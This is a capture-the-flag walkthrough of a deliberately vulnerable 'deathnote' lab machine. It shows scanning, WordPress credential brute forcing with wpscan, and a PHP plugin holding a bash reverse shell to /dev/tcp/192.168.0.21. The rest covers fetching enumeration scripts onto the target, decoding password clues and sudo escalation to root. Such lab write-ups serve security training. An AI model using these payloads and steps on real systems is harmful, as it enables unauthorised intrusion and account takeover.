Netdiscover
sudo netdiscover
192.168.0.27
nmap
nmap -sV -p- 192.168.0.27 PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelgobuster
gobuster dir -t 100 -u http://192.168.0.27 -w Documents/wordlist/directory-list-medium.txt===============================================================
2022/02/07 19:28:21 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 316] [--> http://192.168.0.27/wordpress/]
/manual (Status: 301) [Size: 313] [--> http://192.168.0.27/manual/]
/server-status (Status: 403) [Size: 277]gobuster dir -t 100 -u http://192.168.0.27/wordpress -w Documents/wordlist/directory-list-medium.txt===============================================================
2022/02/07 19:30:38 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 327] [--> http://192.168.0.27/wordpress/wp-content/]
/wp-includes (Status: 301) [Size: 328] [--> http://192.168.0.27/wordpress/wp-includes/]
/wp-admin (Status: 301) [Size: 325] [--> http://192.168.0.27/wordpress/wp-admin/] /etc/hosts
/etc/hosts
192.168.0.27 deathnote.vulnNow I can load the website.
Hint in the source code
view-source:http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txtSo user is a list of username and notes should be a list of password.
brute force wordpress
echo "iamjustic3" >> user.txt
echo "iamjustic3" >> notes.txt
echo "L" >> user.txt
echo "L" >> notes.txtwpscan --url http://192.168.0.27/wordpress/ -U user.txt -P notes.txt[SUCCESS] - KIRA / iamjustic3
[SUCCESS] - kira / iamjustic3
Good, now I have to login and upload a revers shell in php.
Upload the payload
vim rs.php
<?php
/**
* Plugin Name: Peanut's Revers Shell
* Author: Peanutstick
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.21/4648 0>&1'");
?>zip -r rs.zip rs.php
nc -lvp 4648Now I can send the file, and activate it.
Enumeration
Downloading my scripts
On my computer:
python2.7 -m SimpleHTTPServerOn the target
mkdir sc
cd sc
wget http://192.168.0.21:8000/lse.sh
wget http://192.168.0.21:8000/lp.sh
chmod +x lse.sh lp.sh
./lse.sh
./lp.shNothing interesting with the lse
lp:
Sound interesting
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.shGood
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 kira kira 393 Jul 19 2021 /home/kira/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
ChallengeResponseAuthentication no
UsePAM yesUsers:
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Mon Jul 19 11:26:48 -0400 2021
l pts/0 192.168.1.6 Sat Sep 4 06:12:29 -0400 2021
kira pts/1 127.0.0.1 Sat Sep 4 06:00:09 -0400 2021L home
In the file user.txt
www-data@deathnote:/home/l$ cat us*
cat us*
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.Brainfuck
i think u got the shell , but you wont be able to kill me -kira
let’s dive deeper.
/opt/L
www-data@deathnote:/opt/L/fake-notebook-rule$ file case.wav
file case.wav
case.wav: ASCII text
www-data@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3dhttps://www.convertstring.com/fr/EncodeDecode/HexDecode
And I got this: cGFzc3dkIDoga2lyYWlzZXZpbCA=
https://www.base64decode.org/
And I got this: “passwd : kiraisevil”kiraisevil
I’ve tried this password with the ssh key and without, it’s not for the ssh.
kira
su kirra
Password: kiraisevil
id
uid=1001(kira) gid=1001(kira) groups=1001(kira),27(sudo)Spawn a better shell
python3 -c 'import pty; pty.spawn("/bin/sh")'Read kira.txt
cat /home/kira/kira.txt
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIpOh no… I don’t like this.
Nvm let’s be root
$ sudo -l
sudo -l
[sudo] password for kira: kiraisevil
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALLThe basic sudo su.
